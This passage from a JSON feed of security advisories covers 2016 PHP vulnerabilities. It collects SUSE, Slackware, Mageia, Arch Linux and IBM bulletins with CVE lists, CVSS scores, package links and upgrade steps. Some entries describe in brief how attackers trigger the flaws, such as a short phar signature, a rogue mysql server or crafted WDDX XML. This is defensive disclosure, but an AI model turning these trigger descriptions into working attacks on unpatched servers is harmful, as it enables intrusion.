"cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-10-07T21:12:50", "id": "SUSE-SU-2016:2477-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00017.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-06T01:27:34", "description": "This update for php53 fixes the following issues:\n\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n", "cvss3": {}, "published": "2016-10-06T01:08:31", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-10-06T01:08:31", "id": "SUSE-SU-2016:2461-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00008.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-10-05T17:27:35", "description": "This update for php53 fixes the following security issues:\n\n * CVE-2016-7124: Create an Unexpected Object and Don't Invoke __wakeup()\n in Deserialization\n * CVE-2016-7125: PHP Session Data Injection Vulnerability\n * CVE-2016-7126: select_colors write out-of-bounds\n * CVE-2016-7127: imagegammacorrect allowed arbitrary write access\n * CVE-2016-7128: Memory Leakage In exif_process_IFD_in_TIFF\n * CVE-2016-7129: wddx_deserialize allows illegal memory access\n * CVE-2016-7130: wddx_deserialize null dereference\n * CVE-2016-7131: wddx_deserialize null dereference with invalid xml\n * CVE-2016-7132: wddx_deserialize null dereference in php_wddx_pop_element\n * CVE-2016-7411: php5: Memory corruption when destructing deserialized\n object\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n\n", "cvss3": {}, "published": "2016-10-05T18:12:21", "type": "suse", "title": "Security update for php53 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-7414", "CVE-2016-7127", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-7412"], "modified": "2016-10-05T18:12:21", "id": "SUSE-SU-2016:2459-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00006.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:41:08", "description": "This update for php7 fixes the following security issues:\n\n * CVE-2016-6128: Invalid color index not properly handled [bsc#987580]\n * CVE-2016-6161: global out of bounds read when encoding gif from\n malformed input withgd2togif [bsc#988032]\n * CVE-2016-6292: Null pointer dereference in exif_process_user_comment\n [bsc#991422]\n * CVE-2016-6295: Use after free in SNMP with GC and unserialize()\n [bsc#991424]\n * CVE-2016-6297: Stack-based buffer overflow vulnerability in\n php_stream_zip_opener [bsc#991426]\n * CVE-2016-6291: Out-of-bounds access in exif_process_IFD_in_MAKERNOTE\n [bsc#991427]\n * CVE-2016-6289: Integer overflow leads to buffer overflow in\n virtual_file_ex [bsc#991428]\n * CVE-2016-6290: Use after free in unserialize() with Unexpected Session\n Deserialization [bsc#991429]\n * CVE-2016-5399: Improper error handling in bzread() [bsc#991430]\n * CVE-2016-6296: Heap buffer overflow vulnerability in simplestring_addn\n in simplestring.c [bsc#991437]\n * CVE-2016-6207: Integer overflow error within _gdContributionsAlloc()\n [bsc#991434]\n * CVE-2016-4473: Invalid free() instead of efree() in phar_extract_file()\n * CVE-2016-7124: Create an Unexpected Object and Don't Invoke __wakeup()\n in Deserialization\n * CVE-2016-7125: PHP Session Data Injection Vulnerability\n * CVE-2016-7126: select_colors write out-of-bounds\n * CVE-2016-7127: imagegammacorrect allowed arbitrary write access\n * CVE-2016-7128: Memory Leakage In exif_process_IFD_in_TIFF\n * CVE-2016-7129: wddx_deserialize allowed illegal memory access\n * CVE-2016-7131: wddx_deserialize null dereference with invalid xml\n * CVE-2016-7132: wddx_deserialize null dereference in php_wddx_pop_element\n * CVE-2016-7133: memory allocator fails to realloc small block to large one\n * CVE-2016-7134: Heap overflow in the function curl_escape\n * CVE-2016-7130: wddx_deserialize null dereference\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n\n", "cvss3": {}, "published": "2016-10-05T21:08:45", "type": "suse", "title": "Security update for php7 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5399", "CVE-2016-7414", "CVE-2016-6290", "CVE-2016-7127", "CVE-2016-7133", "CVE-2016-4473", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7134", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-6128", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-6161", "CVE-2016-6207", "CVE-2016-6295", "CVE-2016-6297", "CVE-2016-6292", "CVE-2016-7416", "CVE-2016-6289", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-6291", "CVE-2016-6296", "CVE-2016-7412"], "modified": "2016-10-05T21:08:45", "id": "SUSE-SU-2016:2460-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00007.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:41:09", "description": "This update for php7 fixes the following security issues:\n\n * CVE-2016-6128: Invalid color index not properly handled [bsc#987580]\n * CVE-2016-6161: global out of bounds read when encoding gif from\n malformed input withgd2togif [bsc#988032]\n * CVE-2016-6292: Null pointer dereference in exif_process_user_comment\n [bsc#991422]\n * CVE-2016-6295: Use after free in SNMP with GC and unserialize()\n [bsc#991424]\n * CVE-2016-6297: Stack-based buffer overflow vulnerability in\n php_stream_zip_opener [bsc#991426]\n * CVE-2016-6291: Out-of-bounds access in exif_process_IFD_in_MAKERNOTE\n [bsc#991427]\n * CVE-2016-6289: Integer overflow leads to buffer overflow in\n virtual_file_ex [bsc#991428]\n * CVE-2016-6290: Use after free in unserialize() with Unexpected Session\n Deserialization [bsc#991429]\n * CVE-2016-5399: Improper error handling in bzread() [bsc#991430]\n * CVE-2016-6296: Heap buffer overflow vulnerability in simplestring_addn\n in simplestring.c [bsc#991437]\n * CVE-2016-6207: Integer overflow error within _gdContributionsAlloc()\n [bsc#991434]\n * CVE-2016-4473: Invalid free() instead of efree() in phar_extract_file()\n * CVE-2016-7124: Create an Unexpected Object and Don't Invoke __wakeup()\n in Deserialization\n * CVE-2016-7125: PHP Session Data Injection Vulnerability\n * CVE-2016-7126: select_colors write out-of-bounds\n * CVE-2016-7127: imagegammacorrect allowed arbitrary write access\n * CVE-2016-7128: Memory Leakage In exif_process_IFD_in_TIFF\n * CVE-2016-7129: wddx_deserialize allowed illegal memory access\n * CVE-2016-7131: wddx_deserialize null dereference with invalid xml\n * CVE-2016-7132: wddx_deserialize null dereference in php_wddx_pop_element\n * CVE-2016-7133: memory allocator fails to realloc small block to large one\n * CVE-2016-7134: Heap overflow in the function curl_escape\n * CVE-2016-7130: wddx_deserialize null dereference\n * CVE-2016-7413: Use after free in wddx_deserialize\n * CVE-2016-7412: Heap overflow in mysqlnd when not receiving UNSIGNED_FLAG\n in BIT field\n * CVE-2016-7417: Missing type check when unserializing SplArray\n * CVE-2016-7416: Stack based buffer overflow in msgfmt_format_message\n * CVE-2016-7418: Null pointer dereference in php_wddx_push_element\n * CVE-2016-7414: Out of bounds heap read when verifying signature of zip\n phar in phar_parse_zipfile\n\n", "cvss3": {}, "published": "2016-11-01T16:21:27", "type": "suse", "title": "Security update for php7 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2016-5399", "CVE-2016-7414", "CVE-2016-6290", "CVE-2016-7127", "CVE-2016-7133", "CVE-2016-4473", "CVE-2016-7131", "CVE-2016-7125", "CVE-2016-7134", "CVE-2016-7130", "CVE-2016-7129", "CVE-2016-6128", "CVE-2016-7413", "CVE-2016-7126", "CVE-2016-6161", "CVE-2016-6207", "CVE-2016-6295", "CVE-2016-6297", "CVE-2016-6292", "CVE-2016-7416", "CVE-2016-6289", "CVE-2016-7124", "CVE-2016-7417", "CVE-2016-7128", "CVE-2016-7418", "CVE-2016-7132", "CVE-2016-6291", "CVE-2016-6296", "CVE-2016-7412"], "modified": "2016-11-01T16:21:27", "id": "SUSE-SU-2016:2460-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2016-11/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "slackware": [{"lastseen": "2023-06-03T14:53:33", "description": "New php packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/php-5.6.26-i586-1_slack14.2.txz: Upgraded.\n This release fixes bugs and security issues.\n For more information, see:\n https://php.net/ChangeLog-5.php#5.6.26\n https://vulners.com/cve/CVE-2016-7416\n https://vulners.com/cve/CVE-2016-7412\n https://vulners.com/cve/CVE-2016-7414\n https://vulners.com/cve/CVE-2016-7417\n https://vulners.com/cve/CVE-2016-7411\n https://vulners.com/cve/CVE-2016-7413\n https://vulners.com/cve/CVE-2016-7418\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.6.26-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.6.26-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.6.26-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.6.26-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/php-5.6.26-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/php-5.6.26-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.26-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.26-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 14.0 package:\nc35c9a2ecb0efe18d30ac9afd09f2f18 php-5.6.26-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n5d717620237618ae0da8306fb0e103a6 php-5.6.26-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\nc86df189624511380930799eedf7147a php-5.6.26-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n2c306082ce746cccc2c43a975dbf723e php-5.6.26-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nfe9dc583d44d71b359a52f787a3a3586 php-5.6.26-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\n42ba7fa4b436381f508e21fa48c66d40 php-5.6.26-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n56a547e8bc4db3c91d6bfa5c31592175 n/php-5.6.26-i586-1.txz\n\nSlackware x86_64 -current package:\n28256516f8df30cc31d6937c9447853b n/php-5.6.26-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg php-5.6.26-i586-1_slack14.2.txz\n\nThen, restart Apache httpd:\n > /etc/rc.d/rc.httpd stop\n > /etc/rc.d/rc.httpd start", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-23T23:31:48", "type": "slackware", "title": "[slackware-security] php", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-23T23:31:48", "id": "SSA-2016-267-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.449886", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-06-03T15:12:47", "description": "Memory Corruption in During Deserialized-object Destruction) (CVE-2016-7411). Heap overflow in mysqlnd related to BIT fields) (CVE-2016-7412). wddx_deserialize use-after-free (CVE-2016-7413). Out of bound when verify signature of zip phar in phar_parse_zipfile) (CVE-2016-7414). Missing locale length check in php-intl (CVE-2016-7416). Missing type check when unserializing SplArray) (CVE-2016-7417). Out-Of-Bounds Read in php_wddx_push_element) (CVE-2016-7418). The php package has been updated to version 5.6.26, which fixes these issues and other bugs. See the upstream ChangeLog for more details. \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-09-25T15:45:31", "type": "mageia", "title": "Updated php packages fix security vulnerabilities\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7411", "CVE-2016-7412", "CVE-2016-7413", "CVE-2016-7414", "CVE-2016-7416", "CVE-2016-7417", "CVE-2016-7418"], "modified": "2016-09-25T15:45:31", "id": "MGASA-2016-0319", "href": "https://advisories.mageia.org/MGASA-2016-0319.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-18T17:22:34", "description": "- CVE-2016-7411 (arbitrary code execution)\n\nA memory Corruption vulnerability was found in php's unserialize method.\nThis happened during the deserialized-object Destruction.\n\n- CVE-2016-7412 (arbitrary code execution)\n\nPhp's mysqlnd extension assumes the `flags` returned for a BIT field\nnecessarily contains UNSIGNED_FLAG; this might not be the case, with a\nrogue mysql server, or a MITM attack. A malicious mysql server or MITM\ncan return field metadata for BIT fields that does not contain the\nUNSIGNED_FLAG, which leads to a heap overflow.\n\n- CVE-2016-7413 (arbitrary code execution)\n\nWhen WDDX tries to deserialize &quot;recordset&quot; element, use after free\nhappens if close tag for the field is not found. This happens only when\nfield names are set.\n\n- CVE-2016-7414 (arbitrary code execution)\n\nThe entry.uncompressed_filesize* method does not properly verify the\ninput parameters. An attacker can create a signature.bin with size less\nthan 8, when this value is passed to phar_verify_signature as sig_len a\nheap buffer overflow occurs.\n\n- CVE-2016-7416 (arbitrary code execution)\n\nBig locale string causes stack based overflow inside libicu.\n\n- CVE-2016-7417 (insufficient validation)\n\nThe return value of spl_array_get_hash_table is not properly checked and\nused on spl_array_get_dimension_ptr_ptr.\n\n- CVE-2016-7418 (denial of service)\n\nAn attacker can trigger an Out-Of-Bounds Read in php_wddx_push_element\nof wddx.c. A DoS (null pointer dereference) vulnerability can be\ntriggered in the wddx_deserialize function by providing a maliciously\ncrafted XML string.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-09-18T00:00:00", "type": "archlinux", "title": "php: multiple issues", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7414", "CVE-2016-7413", "CVE-2016-7416", "CVE-2016-7411", "CVE-2016-7417", "CVE-2016-7418", "CVE-2016-7412"], "modified": "2016-09-18T00:00:00", "id": "ASA-201609-16", "href": "https://lists.archlinux.org/pipermail/arch-security/2016-September/000712.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "ibm": [{"lastseen": "2023-02-21T21:52:40", "description": "## Summary\n\nMultiple vulnerabilities have been identified in php that is embedded in the IBM FSM. This fix addresses these vulnerabilities.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-7124_](<https://vulners.com/cve/CVE-2016-7124>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by the improper handling of invalid objects by ext/standard/var_unserializer.c. An attacker could exploit this vulnerability using specially crafted serialized data to cause a denial of service. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116959_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116959>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H) \n\n**CVEID:** [_CVE-2016-7125_](<https://vulners.com/cve/CVE-2016-7125>)** \nDESCRIPTION:** PHP could allow a remote attacker to execute arbitrary code on the system, caused by the skipping of invalid session names that triggers incorrect parsing by ext/session/session.c. An attacker could exploit this vulnerability using control of a session name to inject and execute arbitrary code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116958_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116958>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [_CVE-2016-7126_](<https://vulners.com/cve/CVE-2016-7126>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by the failure to properly validate the number of colors by the imagetruecolortopalette function. An attacker could exploit this vulnerability using a large value in the third argument to cause a denial of service. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116957_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116957>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-7127_](<https://vulners.com/cve/CVE-2016-7127>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by the failure to properly validate gamma values by the imagegammacorrect functions. By providing different signs for the second and third arguments, an attacker could exploit this vulnerability to cause an out-of-bounds write. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116956_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116956>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-7128_](<https://vulners.com/cve/CVE-2016-7128>)** \nDESCRIPTION:** PHP could allow a remote attacker to obtain sensitive information, caused by the improper handling of the case of a thumbnail offset that exceeds the file size by the exif_process_IFD_in_TIFF function. An attacker could exploit this vulnerability using a specially crafted TIFF image to obtain sensitive information. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116955_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116955>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)\n\n**CVEID:** [_CVE-2016-7129_](<https://vulners.com/cve/CVE-2016-7129>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by an error in the php_wddx_process_data function. An attacker could exploit this vulnerability using an invalid ISO 8601 time value to cause a segmentation fault. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116954_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116954>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-7130_](<https://vulners.com/cve/CVE-2016-7130>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by a NULL pointer dereference in the php_wddx_pop_element function. An attacker could exploit this vulnerability using an invalid base64 binary value to cause the application to crash. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116960_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116960>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-7131_](<https://vulners.com/cve/CVE-2016-7131>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by a NULL pointer dereference in ext/wddx/wddx.c. An attacker could exploit this vulnerability using an invalid wddxPacket XML document that is mishandled in a wddx_deserialize call to cause the application to crash. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/116953_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/116953>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n**CVEID:** [_CVE-2016-7132_](<https://vulners.com/cve/CVE-2016-7132>)** \nDESCRIPTION:** PHP is vulnerable to a denial of service, caused by a NULL pointer dereference in ext/wddx/wddx.c. An attacker could exploit this vulnerability using an invalid wddxPacket XML document that is mishandled in a wddx_deserialize call to cause the application to crash. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud